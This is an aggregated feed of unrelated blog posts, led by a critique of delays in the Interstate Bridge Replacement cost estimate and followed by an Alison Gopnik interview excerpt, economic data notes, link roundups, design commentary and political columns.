Their excuse for not releasing the cost estimate now is that they say they now need to wait for a Coast Guard decision on bridge height due early next year.  But just 90 days ago, IBR officials told legislators that they could provide an estimate, without waiting for that same Coast Guard decision.    IBR has already costed out both versions of the bridge, and according to their own testimony, almost every other element of the bridge remains the same.  The real reason they’re holding back is that the new estimate is going to push the cost of the bridge up by billions–to between $9 and $10 billion–and they don’t want legislators or the public to know.

IBR officials have given flatly contradictory testimony to the same legislative oversight committee, clearly inventing an excuse to continue to keep legislators (and the public in the dark).

IBR Testimony September 15:  “we have enough information . . .  that we can update and do an estimate now, rather than waiting [for the Coast Guard decision].”

IBR Testimony  December 15:  “. . .information [about the Coast Guard decision] is really critical to develop an accurate and comprehensive cost estimate . . . “

A history of repeated delays for a new cost estimate

For the past two years, the Oregon and Washington highway departments have been stringing along apparently gullible state legislators, failing to reveal the growing cost of the Interstate Bridge Project.  Project Director Greg Johnson disclosed in January of 2024, that the project’s cost estimate was too low, and needed to be revised, promising a new estimate in about six months.  Since then they’ve offered up several new deadlines, and missed every one of them.  A new estimate has always been about 90 to 180 days away.

Three months ago, at a tense hearing with legislators from Oregon and Washington, state transportation officials promised they’d produce a long-delayed new (and higher) cost estimate by December 15.  As KGW reported in September, legislators are getting impatient to see an updated cost estimate.  At a September 15, 2025 meeting of the Oregon and Washington joint legislative commitee overseeing the project, legislators made it clear that they wanted to see a new estimate at their December 15, 2025 meeting.

As the environmental process has dragged on, so has the wait for the cost estimate — but lawmakers on the bi-state committee indicated they’re running out of patience and don’t want to see the cost estimate slip into 2026. Washington Rep. Ed Orcutt requested that the team be ready to provide the new estimate at the committee’s next meeting in December. KGW followed up with [IBR project director Greg] Johnson, who appeared to indicate that the team could meet that deadline, writing in an email that “the Program is currently planning to provide more information on an updated cost estimate and financial plan in the Bi-state Legislative Committee meeting on Dec. 15.”

Washington State Representative Ed Orcutt spoke out at the September meeting:

So on slide 61 you show on the horizon, late 2025 early 2026 is a cost estimate.
We’ve been waiting a long time for an updated cost estimate, and we do have a meeting if I’m correct, on December 15, which is pretty late in 2025, and I believe, about a year since we were promised one.  I would really request that we actually have an updated cost estimate for that December 15 meeting, please. Thank you.

Oregon State Senator Khan Pham recited the long history of delays in releasing a new cost estimate, and the critical need for the legislators to know how much this would cost:

“. . . we have been eagerly awaiting the cost estimate. You know, we were told in 2024 we would get it. . . . you told us in 2024 that it wouldn’t be until June of 2025 when we would get the updated cost estimate, I remember because I specifically said it would be really helpful if we could get it before the transportation session the legislative session ends, so that way we can actually incorporate that into our understanding of what the transportation funding needs are for the state moving forward. But, you know, I was told June 2025, and then, then recently, we were told no, it looks like it’ll be September of 2025, and now we’re looking at December of 2025 if not early 2026 and so I just want to raise that because, . . .  we’re looking at cost increases for ODOT projects of 30, 40, to 50 percent changes, even 40 to 60 percent  changes from 2022 and if the IBR project increase is similar,  at that similar rate, we’re looking at $8 to $10 billion.  It would be helpful if we could get that updated cost estimate as soon as possible, so that way we can incorporate that into our understanding of what our respective legislatures we need to budget for and find funding for.

Another indefinite delay:  And contradictory claims about the Coast Guard

It’s now apparent that Oregon and Washington legislators will have to wait until some time next year to find out how much more the Interstate Bridge Replacement will cost–and what they will be expected to pay. At the Monday morning December 15 meeting, IBR officials made it clear they weren’t going to provide a a new cost estimate until some unspecified time next year (2026).  In a slide presented at the committee meeting, IBR disclosed  they are not going to provide a cost estimate, saying they are waiting for a decision from the Coast Guard which is “necessary to complete and accurate comprehensive cost estimate.”

The IBR’s new interim project director Carly Francis testified on December 15 that IBR was anticipating the Coast Guard’s final navigation decision in early 2026, and that they now found it “critical” to know that decision before publishing a new cost estimate–exactly the opposite of what IBR staff told the same committee three months earlier on September 15:  that knew enough about the fixed and movable spans to develop a cost estimate and that there was no need to wait.

We are, as you’ve heard earlier, anticipating a decision from the Coast Guard in early 2026 regarding bridge height, and that will help confirm which direction we go: fixed or removable span. And also will help us understand final details with respect to getting to the amended record decision, which is that federal approval to move into construction.  When we last met, when you folks last met without me, that timing for that decision from the US Coast Guard was not known, and so given that it is now very in the near term for the program, we are trying to make sure that we’re reflecting that outcome in our planning and the cost estimate body of work. And that information is really critical to develop an accurate and comprehensive cost estimate. I know Ray, deputy program administrator, Ray Mabey already noted that we are ready to build whatever bridge that is permitted.

Francis claims that in December they didn’t know the timing for the Coast Guard decision, but in fact, as IBR associate director Frank Green testified in September, they were projecting exactly the same time frame for the release of the Coast Guard decision as they do now: “early 2026.”  In December, Ms. Francis said “anticipating a decision from the Coast Guard in early 2026 regarding bridge height” which is almost exactly the same as what Mr. Green said in September, “Submittal  of that Navigation Impact Report will likely lead to a revised preliminary clearance navigation determination early next year.”  

IBR officials have thus made directly contradictory statements about whether they needed the Coast Guard decision to produce the cost estimate.    In September, Frank Green, Associate Director of the IBR project, testified to the Joint Oregon-Washington legislative oversight committee that they were planning to release a new cost estimate prior to the Coast Guard issuing a new navigation determination:

We are looking to do an updated cost estimate, as Greg had mentioned earlier,  for both a fixed span bridge and a movable span bridge, recognizing that the program wanted to update our estimate and update our financial plan,  prior to when we’ll have that kind of bridge decision determined. Currently we’re working with the Coast Guard and working with both headquarters. Submittal  of that Navigation Impact Report will likely lead to a revised preliminary clearance navigation determination early next year, but we recognize we have enough information on the fixed span and conceptual understanding of what the movable bridge would be so that we can update and do an estimate now, rather than waiting for that PNCD, and having that that cost estimate take a little bit longer.

Video Recording of September 15, 2025 Oregon Washington Committee Meeting at approximately 59:30.  (emphasis added)

As KGW TV, noted in its report on the December 15, 2025 meeting, Green’s earlier testimony made it clear that there was no need to delay the release of an estimate because of the timing of the Coast Guard decision.

But Green also indicated at the time [September 15] that preparing two estimates wouldn’t be a problem, and that the team was planning to do so before it received a decision from the Coast Guard.

Blaming the Coast Guard not only directly contradicts what they told legislators in September, it represents a new and different excuse for delaying release of a new cost estimate.  In August, project director Greg Johnson claimed that the preparation of the cost estimate was delayed by an the project’s extended NEPA review–even though the cost estimate process is independent of NEPA.

A chronology of repeated delays in releasing a new, higher cost estimate

That means that it will now have been more than two years since IBR first publicly acknowledged that a new and higher cost estimate for the IBR was in the works.  In January, 2024, project director Greg Johnson told Oregon Public Broadcasting that they’d have a new estimate in about six months.  Since then, as we’ve chronicled at City Observatory, IBR officials have repeatedly delayed revealing a new cost estimate.  A brief chronology of promised (and missed) deadlines for new cost estimates are as follows:

  • Jan 2024: IBR cost update will be out in six months
  • June 2024: announces it’ll be June 2025 (another year)
  • April 2025: not until September 2025 (five more months)
  • September 2025: not until December 2025 (three more months).
  • And now, in December 2025, we’re told, it will be “early 2026.” (another three to five months)

No matter what date it is, it always seems like we are three months, six months or a year away from finding out the real cost of the IBR.  It has been apparent through all this time that the cost will go up significantly, almost certainly into the $9 billion$10 billion range.  The truth is not that IBR staff can’t generate a cost estimate; it’s that they can’t handle the blowback that will come when they finally ‘fess up to the project’s vastly inflated costs.

A politically inconvenient cost overrun

The repeated delays of the embarrassing cost increase correspond closely to major political developments.  Throughout the 2025 Oregon Legislative session, as legislators were debating a multi-billion dollar transportation package, ODOT buried and refused to talk about the growing cost of the IBR.  The big transportation bill, HB 2025, failed to move forward in the regular legislative session, and the Governor called legislators back to a September special session, which belatedly passed a much smaller stopgap funding measure, HB 3991.  Now, major portions of that bill, including key tax increases, are likely to be referred to Oregon voters for a referendum in 2026.  In addition, both Oregon and Washington face significant fiscal challenges in the year ahead, something both legislatures will be dealing with in just a few weeks.  The Oregon Legislature will convene for its even-year “short” session on February 2 and adjourn no later than March 9, 2026.  Washington’s Legislature convenes on January 12 and should adjourn on March 12. Anybody want to lay odds that the new cost estimate won’t come out until mid-March, or later?

The truth is that IBR project officials have a very, very good idea of the range of probable costs of both the fixed span and movable span options.  The IBR has had a team of staff and consultants working on cost issues for years:  this is an ongoing part of project planning, and not an episodic effort that only happens after one or two external bureaucratic hurdles are crossed.  IBR, as their outgoing project director has said, is building “basically the same project” as the old Columbia River Crossing, and virtually none of the major features of the project have changed in the past three years.  It’s also important to keep in mind that the cost estimate is not a single precise dollar amount; rather it is a wide range:  the current estimate (produced three years ago) has a mid-point of $6 billion, with a range of costs running from $5 billion to $7.5 billion).  It beggars belief that a project that has spent $273 million on consultants over the past seven years doesn’t have a pretty good idea within a billion dollars or so of what the current estimated cost of this project is (with an allowance for the added cost of a movable span option).   The reality here is not that IBR doesn’t know about how much this will cost, it is that they really don’t want anybody else to know how much it will cost.

Coast Guard is unlikely to have a decision any time soon

Portland television station KGW-TV has closely followed the IBR permitting plans.  It has interviewed Greg Johnson, and noted that while Johnson hopes that they will have a Coast Guard decision in just 90 days, by mid-February 2026, that could be the “best case” scenario.

As KGW noted, last time IBR sought a Coast Guard determination it took nearly six months, which would put a determination into May, 2026–and presumably, the release of a final cost estimate would be some time after that.  (And either way, the Coast Guard decision and the new cost estimate won’t be made until after Greg Johnson’s final day as IBR director–already set for January 2026).

And even though they say they are waiting for a new Coast Guard preliminary navigation decision, it will likely be weeks or months after that decision before IBR actually releases a new cost estimate.  Like her predecessor, Carly Francis was utterly opaque about the timing of the next estimate.  As KGW TV reported, IBR “did not offer any kind of definitive timeline this time around, quoting Carley Francis as saying:

“I would say we are trying to get things done certainly early next year to be able to fit into all of the necessary time frames.  So I think that is sort of in that scale of a month or two space to be able to finalize that stuff but that’s sort of a loose range is what I can say to you today because we don’t have it mapped out completely and because of the differences in schedule in the delivery of a fixed and a moveable span

 

 

 

 

 

 

We’re getting down to the wire for gifts to be shipped in time for Xmas. Take a look at the 2025 Kottke Holiday Gift Guide if you still need to shop for your fam & friends.

My Conversation with Alison Gopnik

Here is the audio, video, and transcript.  Here is part of the episode summary:

Tyler and Alison cover how children systematically experiment on the world and what study she’d run with $100 million, why babies are more conscious than adults and what consciousness even means, episodic memory and aphantasia, whether Freud got anything right about childhood and what’s held up best from Piaget, how we should teach young children versus school-age kids, how AI should change K-12 education and Gopnik’s case that it’s a cultural technology rather than intelligence, whether the enterprise of twin studies makes sense and why she sees nature versus nurture as the wrong framework entirely, autism and ADHD as diagnostic categories, whether the success of her siblings belies her skepticism about genetic inheritance, her new project on the economics and philosophy of caregiving, and more.

Excerpt:

COWEN: If it’s something like height, where there is clearly an environmental component, especially if the child is not well-fed, but it seems perfectly fine to say above a certain dietary level, it’s mostly genetic, right? No one says that’s ambiguous, and more and more traits will become like that.

GOPNIK: Well, first of all, I’m not sure that’s true. To a striking degree, the traits that people have looked at, like educational attainment, for example — we haven’t found consistent relationships to genetics. I think the reason for that is exactly because there’s this very complicated developmental process that goes from the genetics to the outcome.

Even if you think about fruit flies, for example. I have some geneticist colleagues who work on this — fruit fly sex determination. You’d think, “Well, that has to be just the result of genes.” It turns out that there’s this long developmental — long by fruit fly standards — developmental process that goes from the genetics to the proteins to the morphology, and there’s lots of possibility of variation throughout that. I think that hasn’t turned out to be a scientifically helpful way of understanding what’s going on in development.

The other thing, of course, is, from my perspective, the common features of, say, what kids are doing are much more interesting than the variations. What I really want to know is how is it that anyone could have a brain that enables them to accomplish these amazing capacities? Thinking about, is this child smarter than the other one, given how unbelievably smart all of them are to begin with, I just think it’s not an interesting question.

COWEN: But say, what you would call the lay belief that smarter parents give birth to smarter children, at least above subsistence — surely you would accept that, right?

GOPNIK: Again, what does smarter mean?

COWEN: How you would do on an IQ test.

GOPNIK: What does genetics mean? It’s interesting, Tyler, that IQ tests, for example — they have their own scholarly and scientific universe, but they’re not something that we would teach about or think about in a developmental psychology class, and there’s a good principled reason for that. The good principled reason — this has come up a lot in AI recently. There’s this idea in AI of artificial general intelligence, and that is assuming that there’s something called general intelligence.

Again, I think, a lot like consciousness or life, it’s one of these lay ideas about how people work. When you actually look at children, for example, what you see is not just that there isn’t a single thing that’s general intelligence. You actually see different cognitive capacities that are in tension with one another. You mentioned one about the scientist who’s trying to think of some new idea versus the scientist who’s looking at a more specific idea, right? A classic example of this tension that I’ve talked about and studied is in computer sciences: exploration versus exploitation.

What do you count as IQ? In fact, most of what IQ is about is how well do you do in school? How well do you do on school tests? That’s actually, in many respects, in tension with how good are you at exploring the world around you? The kinds of things that you need to do to have particular goals, to accomplish them, the kinds of things that we emphasize a lot, say, in a school context, are actually in tension. This gets back to the point about babies being more conscious than we are — are actually in tension with the kinds of things that will let you explore.

Think about the Bayesian example. If you have a flatter prior, and you pay more attention to evidence, you are probably not going to do as well on an IQ test…

COWEN: There’s you — you’re tenured at Berkeley, you’re famous. There’s Blake, The Definitive Warhol Biography, and Adam, who’s amazing, writes for the New Yorker, and you don’t believe inheritability and IQ being very concrete things? I just don’t get it. I think you’re in denial.

GOPNIK: Actually, I think that example is maybe partly why I don’t believe in that. In fact, what I do believe is that the effect of caregiving is to increase variability, is to increase variation. Our family, our care — there were six of us in 11 years. My parents were graduate students, and even before they were graduate students, they were that great generation of immigrant kids.

We had this combination of a great deal of warmth, a great deal of love, an enormous amount of stuff that was around us — books and ideas. We got taken to the Guggenheim, when Adam was three and I was four, for the opening of the Guggenheim. We both remember this vividly. But we were also completely free. We were just in regular public schools. As was true in those days, in general, we came home after school, and we basically did whatever it was that we wanted. I was involved. The kids were taking care of each other a lot of the time.

The result is that you get a lot of variation. It’s an interesting example in our family where we have six kids who presumably all have somewhat similar genetics, all in that 11 years grow up in the same context, and they come out completely differently. They come out with really different strengths, really different weaknesses, things that they’re good at, things that they’re not good at. Even if you think about what Blake and Adam and I are like as thinkers, we’re all foxes instead of hedgehogs. We’re all people who have done lots of different things and thought about lots of different things.

So, my view is that what nurture will do is let you have variability. That’s the thing that, in a sense, is heritable. That’s contradictory, the idea that what’s heritable is the standard deviation instead of the mean, but that’s my view about that. I think my childhood did have the effect of making me suspicious of those simple nature-nurture oppositions.

Here are the books of Alison Gopnik.

The post My Conversation with Alison Gopnik appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

Thursday: CPI, Unemployment Claims, Philly Fed Mfg

Mortgage Rates Note: Mortgage rates are from MortgageNewsDaily.com and are for top tier scenarios.

Thursday:
• At 8:30 AM: The initial weekly unemployment claims report will be released.  There were 236,000 initial claims last week.

8:30 AM ET, The Consumer Price Index for November from the BLS.  The consensus is for a 0.3% increase in CPI, and a 0.2% increase in core CPI.  The consensus is for CPI to be up 3.1% year-over-year and core CPI to be up 3.1% YoY.

8:30 AM: the Philly Fed manufacturing survey for December. The consensus is for a reading of 2.2, up from -1.7.

11:00 AM: the Kansas City Fed manufacturing survey for December.

The Apollo Transforming Printer

On the Library of Congress’s Worlds Revealed blog, a fascinating piece on a fascinating piece of hardware used by NASA to process lunar photographs taken for and by the Apollo program into orthorectified imagery useful… More

‘Three Norths’ Leave England

The Ordnance Survey has announced that the triple alignment of true north, grid north (on OS maps) and magnetic north—the so-called three norths—has left England and is now over the North Sea. It’ll make landfall… More

Wednesday 17 December 1662

This morning come Mr. Lee, Wade, and Evett, intending to have gone upon our new design to the Tower today; but it raining, and the work being to be done in the open garden, we put it off to Friday next. And so I to the office doing business, and then dined at home with my poor wife with great content, and so to the office again and made an end of examining the other of Mr. Holland’s books about the Navy, with which I am much contented, and so to other businesses till night at my office, and so home to supper, and after much dear company and talk with my wife, to bed.

Read the annotations

Telescope Types

I'm trying to buy a gravitational lens for my camera, but I can't tell if the manufacturers are listing comoving focal length or proper focal length.

What’s happening over that tree? What’s happening over that tree?


Lawler: Early Read on Existing Home Sales in November and Update on Mortgage/MBS Yields and Spreads

Today, in the Calculated Risk Real Estate Newsletter: Lawler: Early Read on Existing Home Sales in November and Update on Mortgage/MBS Yields and Spreads

A brief excerpt:
From housing economist Tom Lawler:

Based on publicly-available local realtor/MLS reports released across the country through today, I project that existing home sales as estimated by the National Association of Realtors ran at a seasonally adjusted annual rate of 4.10 million in November, unchanged from October’s preliminary pace and down 1.7% from last November’s seasonally adjusted pace. Unadjusted sales should show a larger YOY % decline, reflecting this November’s lower business-day count relative to last November.

Local realtor/MLS reports suggest that the median existing single-family home sales price last month was up by about 1.9% from a year earlier.

CR Note: The NAR is scheduled to report November existing home sales on Friday. The consensus is for 4.15 million SAAR, up from 4.10 million in October.
There is much more in the article.

Links 12/17/25

Links for you. Science:

The Rainforests Being Cleared to Build Your R.V.
What new protections will mean for these widely hunted sharks
Humans killed millions of vultures. Now people are paying the price.
The common vaccines that can prevent chronic disease or some cancers
Scientists may have solved why this ancient, advanced civilization vanished
Elusive orchid plays key role in plan to bring bird back after 30 years

Other:

Doughnuts and Bullets: The agony and absurdity of working for RFK Jr. (must-read)
The Job Market
Republicans nix bill naming D.C. post office after Chuck Brown (BOOOO!!!!)
The Pundits Were All Wrong (very good)
A Few Bad Men: The Hegseth murder-on-the-high-seas scandal is only part of the story. This administration has put sadism at the heart of its policy and its politics.
The First Epstein Report Ignored Summers. Harvard Must Do Better.
Statement from the American Economic Association (on Summers’ resignation)
Delirious president goes on manic posting binge
Trump Seizes Back the Spotlight. That may not be the boon he thinks it is.
Cracks have emerged in the Maga coalition
“Subway Builder” turns Metro enthusiasts into transit designers (very cool)
Waymo’s Self-Driving Cars Are Suddenly Behaving Like New York Cabbies
About That Safety Thing
OpenAI’s “Code Red”
Who Amongst Us
Trump just trashed his most major issue: ‘Worst messaging from a politician in history’
Small businesses suffer brutally under Trump
The 26-Minute, 51% Wipeout That Deepened the Trumps’ Crypto Woes
Steve Bannon’s Surprisingly Key Role in the Epstein Scandal
Olivia Nuzzi tries and fails to save her reputation in ‘American Canto’
What the special election in Tennessee says about the 2026 midterms
Why Does A.I. Write Like… That?
‘Kill Everybody’: Hegseth’s Reported Order Echoes WWII War Crime
Detroit finally has a RoboCop statue
Trump calls Ilhan Omar ‘garbage’ and says Somalis should ‘go back to where they came from’
Suspect arrested in January 2021 D.C. pipe bomb case
Trump pardons grifter indicted by his administration earlier this year
Trump Is Wreaking Havoc With His Favorite Power
Trump’s own voters begin blaming him for affordability crisis
Palantir CEO Says Making War Crimes Constitutional Would Be Good for Business

A Reading List for the End of Civilization

Not long ago, I got touted in The Atlantic as the ultimate source on the death of civilization. I responded with denials, and even offered to take a polygraph test.

I’m innocent. I’m just a patsy. They’re trying to pin this on me—don’t believe them.

Then I pulled out the ultimate alibi: The death scene was a set-up. Civilization isn’t dying—it’s coming back. Just give it time.

I spelled out the reasons in this article.

Ah, but I still had some things to explain. That’s because The Atlantic published evidence of my complicity—all because of 41 mysterious books.

Some of my books on societal collapse

Here’s what they pinned on me:

Last year, I visited the music historian Ted Gioia to talk about the death of civilization.

He welcomed me into his suburban-Texas home and showed me to a sunlit library. At the center of the room, arranged neatly on a countertop, stood 41 books. These, he said, were the books I needed to read.

The display included all seven volumes of Edward Gibbon’s 18th-century opus, The Decline and Fall of the Roman Empire ; both volumes of Oswald Spengler’s World War I–era tract, The Decline of the West ; and a 2,500-year-old account of the Peloponnesian War by Thucydides, who “was the first historian to look at his own culture, Greece, and say, I’m going to tell you the story of how stupid we were,” Gioia explained.

Gioia’s contributions to this lineage of doomsaying have made him into something of an internet celebrity….

In the aftermath, everybody was asking about those 41 books. Did I really have a reading list for the end of civilization?

With some reluctance, I agreed to share it. I’m doing that today.

But don’t hold it against me. Books are just circumstantial evidence. I didn’t actually kill civilization—I just read about it. I never left my comfy chair.

It’s true that I earned a living, some years back, as a kind of futurist. This is a valuable skill in turbulent times. I probably handled this vocation with a more holistic approach than others. That meant that I took old books and primary sources very seriously, and used them to interpret current day statistical, anecdotal, and theoretical information.


Please support my work—by taking out a premium subscription (just $6 per month).

Subscribe now


In my world, game theory and data analysis co-exist with history, philosophy, and literature—some of it two thousand years old. If you can bring those together, you may gain insights that others might miss.

That’s what I try to do here at The Honest Broker.

With that proviso, I’ll recommend the following books on societal collapse. It’s not the full 41 volumes mentioned above—but below I will discuss 22 of those titles.

Read more

An RCT on AI and mental health

Young adults today face unprecedented mental health challenges, yet many hesitate to seek support due to barriers such as accessibility, stigma, and time constraints. Bite-sized well-being interventions offer a promising solution to preventing mental distress before it escalates to clinical levels, but have not yet been delivered through personalized, interactive, and scalable technology. We conducted the first multi-institutional, longitudinal, preregistered randomized controlled trial of a generative AI-powered mobile app (“Flourish”) designed to address this gap. Over six weeks in Fall 2024, 486 undergraduate students from three U.S. institutions were randomized to receive app access or waitlist control. Participants in the treatment condition reported significantly greater positive affect, resilience, and social well-being (i.e., increased belonging, closeness to community, and reduced loneliness) and were buffered against declines in mindfulness and flourishing. These findings suggest that, with purposeful and ethical design, generative AI can deliver proactive, population-level well-being interventions that produce measurable benefits.

That is from a new paper by Julie Y.A. Cachia, et.al.  A single paper or study is hardly dispositive, even when it is an RCT.  But you should beware of those, such as Jon Haidt and Jean Twenge, who are conducting an evidence-less jihad against AI for younger people.

Via the excellent Kevin Lewis.

The post An RCT on AI and mental health appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

James Cameron’s Instructions to Theater Projectionists Regarding ‘Avatar 3: Fire and Ash’

The letter is typeset in Papyrus, the typeface for which James Cameron’s affection inspired not one but two classic SNL shorts starring Ryan Gosling — which Cameron has a good sense of humor about.

Terrence Malick’s letter accompanying Tree of Life in 2011 was plainly and humbly set in Helvetica. David Lynch’s accompanying Mulholland Drive was also in Helvetica, but in a very Lynchian way. And then there is Stanley Kubrick, whose letter to projectionists that accompanied Barry Lyndon was typeset in Futura — quite the feat in 1975. (It was almost certainly IBM’s Mid-Century typeface, a beautiful adaptation of Futura for their Executive line of typewriters.)

 ★ 

Typefaces for Dyslexia

I dare say this post from Adrian Roselli — first published in 2015 and updated 16 times (and counting) since — is the definitive debunking of the pseudoscience claims regarding deliberately ugly fonts being somehow beneficial to readers with dyslexia.

 ★ 

Zara Picken’s ‘Modern Illustration’

Modern Illustration is a project by illustrator Zara Picken, featuring print artefacts from her extensive personal collection. Her aim is to preserve and document outstanding examples of mid-20th century commercial art, creating an accessible resource for understanding illustration history.

Glorious collection of mid-century illustrations and graphic design. Also a good follow on Instagram. (Via Dan Cederholm.)

 ★ 

★ Apple TV’s New Fanfare

Tim Nudd, writing at Ad Age a few weeks ago (paywalled, alas):

As we mentioned in roundup yesterday, Finneas (aka, Finneas O’Connell) has developed a new sonic logo for Apple TV, the streaming service previously known as Apple TV+. However, the rebrand, created with Apple agency TBWA\Media Arts Lab, goes beyond the audio mnemonics to include a striking new visual look as well.

The visual branding centers on layers of shifting colored light, a metaphor for the range of genres and emotions that Apple TV has cultivated since its 2019 debut.

I held off on posting about this new Apple TV fanfare (a.k.a. sonic logo, a.k.a. mnemonic ) until I’d experienced it a few times, and after a few weeks, watching a bunch of episodes from a few Apple TV series — Mr. Scorsese, a 5-star five-part documentary by Rebecca Miller, absolutely riveting; Pluribus, Vince Gilligan’s excellent new the-less-you-know-about-it-before-you-start-watching-the-better series starring Rhea Seehorn; and The Morning Show season 4, a series that’s skirting just above the good-enough-to-keep-watching line for me — I’m willing to render a verdict.

I love it.

The old one was not bad. But “not bad” should never be good enough for Apple. I can’t find anyone from Apple stating so explicitly, but it seems pretty obvious that the piano chord accompanying the old fanfare was meant to evoke the Macintosh startup chime. That’s a neat idea. And no one is more a fan of the Macintosh than me. I’d argue that the Mac remains the definitive Apple product, the one that best exemplifies everything the company does and should stand for. So harking back to the Macintosh was an interesting idea for the Apple TV fanfare/sonic logo/mnemonic.

But: it just wasn’t great. What makes that chord great for a computer booting up doesn’t make it great for a cinematic sonic logo. Netflix’s “tudum” is so iconic that it’s the name of their company blog. HBO’s static + chanted om is the OG standard-setter. I suspect the new Apple TV fanfare will be seen in that class. The old one was not.

The new one feels like a branding stroke unto itself. Sonically, it doesn’t evoke anything else. It just sounds rich and cool. Visually, with its rotating prism effect, it does evoke the classic six-color Apple logo. Thus, despite moving away from a sonic callback to the Macintosh, the overall effect feels more rooted to Apple’s on-the-cusp-of-a-half-century history. The change makes Apple TV original content feel more like a part of Apple, less like a possible passing fancy (which is what many in Hollywood fear).

That prism effect was created practically. From a LinkedIn post from Apple’s longtime agency partner TBWA Media Arts Lab (no clue why they posted this on LinkedIn, of all places):

Built from real glass and captured entirely in camera, the new identity explores reflection, color, and light to express the cinematic spirit at the heart of Apple TV. Every shimmer was made for real, no CG shortcuts, a nod to Apple’s belief that craft should be felt, not faked.

The work spans the entire platform, from a sharp five-second show open to a full-length cinematic version for films, paired with a new sonic logo composed by Oscar winner Finneas and a custom typeface, SF TV, developed with Apple’s design team.

They include a very short video showing behind the scenes of its creation. It matters not to me that they photographed this practically, rather than via computer-generated graphics, but the bottom line is that it looks cool, timeless, and Apple-y.

Chris Willman at Variety has an interview with Finneas (O’Connell) regarding the music:

Mnemonic, Finneas says, “is sort of a beautiful word for a logo” accompanied by sound. “The things that I think of as real classic mnemonics are NBC — you can hear that in your head — or HBO has its static.” Finneas is well aware of how modern streaming consumption might make this especially ubiquitous, household by household. “If you’re binge-ing the whole season of Ted Lasso or Severance or Disclaimer” (the last of those being the limited series that he composed the score for himself), “you’re going to hear the mnemonic 10 times in one day. So it’s gotta be something that’s like the bite of ginger between rolls or something, you know?”

See and hear for yourself. Here’s the old Apple TV mnemonic:

Here’s the new 5-second version, shown at the beginning of each episode of Apple TV original series:

And here’s the full 12-second version, shown before Apple Original Films:

Bravo.

AIA: "Architecture firm billings remain stagnant" in November

Note: This index is a leading indicator primarily for new Commercial Real Estate (CRE) investment including multi-family residential.

From the AIA: Architecture firm billings remained soft in November
The AIA/Deltek Architecture Billings Index (ABI) score for the month remained well below the 50 level at 45.3 (a score over 50 indicates billings growth). This marked the 13th consecutive month of declining billings at architecture firms, and the 35th month of a score below 50 out of the last 38. Inquiries into new projects only increased modestly this month, and the value of newly signed design contracts continued to soften. Until work in the pipeline starts to pick back up, firms are unlikely to see a significant increase in their billings.

While business conditions at architecture firms have been soft in most sectors this year, the Midwest remained a bright spot in November. Billings increased at firms located in that region for the third consecutive month, and more firms reported growth this month than last month. However, billings continued to decline at firms located in all other regions of the country, particularly at firms located in the Northeast and the West. Firms of all specializations also saw billings continue to contract in November, although fewer firms with multifamily residential and institutional specializations reported declines than last month.
...
The ABI serves as a leading economic indicator that leads nonresidential construction activity by approximately 9-12 months.
emphasis added
• Northeast (43.1); Midwest (52.3); South (46.1); West (43.6)

• Sector index breakdown: commercial/industrial (45.2); institutional (47.6); multifamily residential (46.6)

AIA Architecture Billing Index Click on graph for larger image.

This graph shows the Architecture Billings Index since 1996. The index was at 45.3 in November, down from 47.6 in October.  Anything below 50 indicates a decrease in demand for architects' services.

This index has indicated contraction for 36 of the last 38 months.

Note: This includes commercial and industrial facilities like hotels and office buildings, multi-family residential, as well as schools, hospitals and other institutions.

This index usually leads CRE investment by 9 to 12 months, so this index suggests a slowdown in CRE investment throughout 2026.

Multi-family billings have been below 50 for 40 consecutive months.  This suggests we will some further weakness in multi-family starts.

Join Us In This Super Fun Thing!

As the year winds down, we have a fun little project I want to pitch you on. It’s a key, incremental part of keeping TPM strong, vital and moving forward into the new year and beyond. Right now, we are 279 subscriptions short of a net increase of 3,000 subscribers for the year. True, this is not a bumper-sticker ready declaration. But it’s an important one. We want and need to keep growing like that as we move forward and the 3,000 net new members is a big milestone. So if you’ve been thinking about subscribing, please consider doing it before the new year.

And here’s the incentive. We have a supply of high-end TPM t-shirts and baseball caps from TPM’s 25th anniversary. These isn’t your standard made-on-demand online merch stuff. This is high end, plush, well made. I’m not saying it’s quite Louis Vuitton. But if you went to the campus bookstore at your alma mater and thought of getting a sweatshirt or something, it’d be that level of quality. If you are a non-member and you sign up for a TPM AF (ad free) annual membership we will give you a choice of either a T-shirt or a cap. This is while supplies last. We’ll update each day to tell you what we have left. If you are currently a TPM Prime member and you upgrade to ad free, we will make the same offer. Just to be super clear, we cannot do this for a regular TPM Prime membership. This does not mean that we don’t want you to sign up or that we’re not super grateful but these are pricey and we are trying to offer these as an additional incentive. (I’ll note how to claim your merch below.) Mainly, the reason to do this is to join our community and support our team’s work. People are often amazed that this little organization remains when so many other bigger ones, richer ones, hotter ones, have fallen by the wayside. This is why. We have this community who wants to be part of what we do and support what we do for the relatively small cost of a subscription. Click here to join right now.

______

INSTRUCTIONS: If you sign up for a new TPM PRIME AF (ad free) annual membership, here’s what you do to claim your merch. Sign up or upgrade to the new membership. You’ll get a receipt by email. Someone at TPM will then follow up later (that day or the next) by email to get the details about your merch preferences and where to send it. That’s it. As I said, we will do this while supplies last and we are making the offer through this week. We will update on the Editor’s Blog if we run out of merch by the end of the week.

‘Trump’s Totally My Bitch!’ and Other Wild Quotes From Susie Wiles

Our bespoke piñata of the day is the Susie Wiles piece in Vanity Fair (they must be excited to move on from Olivia …) We’re seeing the standard incantations of “fake news” from none other than Wiles herself. Trump’s Cabinet secretaries have all lined up to post tweets repeating the claim, intoning the Trump-Wiles catechism as though they’d just emerged from a fast-forward struggle session with a pack of feral MAGA toughs. I’ve started making my way through the morselly excerpts, as perhaps you have or are too. What struck me here was perhaps not even so much the quotes as the venue.

Few American publications are more at the heart of the cosmopolitan world of America than Vanity Fair. That is not liberal. Small-c cosmopolitan is different but overlapping. But it is perhaps even more than “liberal” what MAGA is talking about when it denounces the “coastal elite.” Certainly they’re talking more about that than, like, People for the American Way or Americans for Democratic Action or Heather Cox Richardson. Susie Wiles is no fool. And while she may — as in a very low de minimis chance — have gotten a touch injudicious in a few quotes, she certainly knew with perfect clarity what Vanity Fair is.

And this makes me wonder a few things. The rallying around the flag has been rapid and total. Just goddamn absolute. Perhaps we’ll see some hemorrhaging over the coming days. But I doubt it. And to me that means that Wiles has total confidence in her position, either because her hold over Trump is that secure (which I think it is) or that it is secure in part because of his increasingly clear enervation (which I think is at least part of the equation.)

To make clear what I mean, there’s the channel of her personal security, which there’s every reason to believe is very, very strong. And there’s Trump’s personal enervation, the slow loss of coherence and synaptic fragmentation we see both in his personal conduct and in the slackening reins of power around him.

